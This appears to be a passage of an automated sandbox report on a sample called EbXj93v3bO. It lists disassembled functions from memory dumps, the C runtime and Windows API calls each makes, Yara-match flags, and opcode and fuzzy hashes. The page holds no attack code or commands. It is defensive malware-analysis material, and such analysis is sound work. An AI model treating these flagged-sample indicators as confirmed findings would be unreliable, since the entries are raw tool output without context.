Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0252D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0252D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0252D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0252D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0252D0CD

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: e71c630f9e9b92c197875a16b37da17ab8a47d54174c7e5590010fdbe9a04534
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: D0F0593190122463C324FA10D841DBEB77ABED2B28760852AD845131D1EB35A90ECA69

Function 02515A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02515A83
__Cnd_signal.LIBCPMT ref: 02515A8F
std::_Cnd_initX.LIBCPMT ref: 02515AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02515AAB

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: f27cbda7072424b417241fc12de1c8d1efd21ae07cd704d019d2fab649148022
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: C5F0E536400703AFFB217771D80672AB7B2BF81729F54885DE189568E0DFBAE8148E5D

Function 02522858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0252286F
GetLastError.KERNEL32(?,?,?,?,02528830,?,?,?,?,00000000,?,00000000), ref: 0252287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02522894
__CxxThrowException@8.LIBVCRUNTIME ref: 025228A2

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 7e59d23384231d1476f885827326d265c51a7a9b7e2364713367b04281a20703
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: FFF0303950021ABBCF10EFA4CD45EAF7BB87B01751F600655B915E60E0DB75D6089B68

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0252257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02522593
GetLastError.KERNEL32(?,?,?,?,?,02520DA0), ref: 025225A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025225B7
__CxxThrowException@8.LIBVCRUNTIME ref: 025225C5

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 59337950094f1c7afcbf13a84b9faa6e58a977a81c0b92c1057aa889a0caa722
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 49E0D86560022629E710B7748C17F7F369C6B01B41F444851BD14E50C1FA94D50449AC

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 02529530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02522959: TlsAlloc.KERNEL32(?,02520DA0), ref: 0252295F

TlsAlloc.KERNEL32(?,02520DA0), ref: 02533BE6
GetLastError.KERNEL32 ref: 02533BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02533C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02533C1C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 4f2b8bbe1f65ff9a78b86c797e89057e3887468f2550da037505f8a628eac67b
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 75E06838400217BFC300BB75EC99ABE77687A01702B100EA6F426E30E0EB34D10D8EAC

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02522794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02520DA0,?,?,?,00000000), ref: 0252279E
GetLastError.KERNEL32(?,?,?,00000000), ref: 025227AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025227C3
__CxxThrowException@8.LIBVCRUNTIME ref: 025227D1

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 4517f911eeebd25df2f49c09a994966bd756fa5c5a159449671d939b1e5b4a9f
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: 41E04F7860011AA7CB04FBB5DD49AAF77BC7A01B05F600565B901E21D0EB68D7089B6D

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 025228EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 025228F8
GetLastError.KERNEL32 ref: 02522904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0252291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02522928

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: b0939db629c19d52596961e6e2bea736dddee0e1070f09c0887fa852666187f1
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 11E0863850011A67CB14BF71CC09BBF7B6C7B01745F500925BC55E20E0EB35D2089A9C

Function 025229B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02527BD8,00000000,?,?,02520DA0,?,?,?,00000000,?,00000000), ref: 025229BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 025229CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025229E0
__CxxThrowException@8.LIBVCRUNTIME ref: 025229EE

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: cbb550ef52d9221fa3cfb37849eda7ec4bee775a349e6bc3b9f3a62d901bb66f
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 0BE04F3910011A6ADB10BF60CC08BBE7B687B01745F500925B959E10E0EB39D1589AAC

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 02522959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02520DA0), ref: 0252295F
GetLastError.KERNEL32 ref: 0252296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02522982
__CxxThrowException@8.LIBVCRUNTIME ref: 02522990

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 74cd5a9d8790c65ffab0a168646ee2e6344793386c108f97b3d0d4fe92e60c56
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: A1E0127850012A678714BBB89C4DA7F76AD7A02765F600F25F865F20E0EB68D14C8AAD

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 025220FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 02522103

Part of subcall function 02521379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0252139A
Part of subcall function 02521379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 025213D1
Part of subcall function 02521379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 025213DD

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0252210F

Part of subcall function 02520CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02520D0E

Concurrency::Context::Block.LIBCONCRT ref: 02522114

Part of subcall function 02522EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02522ECA

Concurrency::critical_section::lock.LIBCONCRT ref: 02522134

Part of subcall function 025212A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 025212B0
Part of subcall function 025212A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 025212BD
Part of subcall function 025212A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 025212C8

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 89036ee24b618834687d6162629d165170cd140751392d9c20375cde2b6bcfa5
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: 1CE09A35500527ABCB08FB20C5600ACBB62BFC6310B6482049469872E0CF246A0ACF88

Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C

Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8

Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7

Concurrency::Context::Block.LIBCONCRT ref: 00411EAD

Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63

Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD

Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0254B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0254B32B,?,00000050,?,?,?,?,?), ref: 0254B1AB

Strings

OCP, xrefs: 0254B124
ACP, xrefs: 0254B0EE

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: f92c0b6fc6b318e04ca189daf6c429e4a0e6025af2608f627f87736966ee5c95
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 99218672E14105A6EB248E64CD05BA7F7AAFF84B5DF469424E909D7204FF32D900C398

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
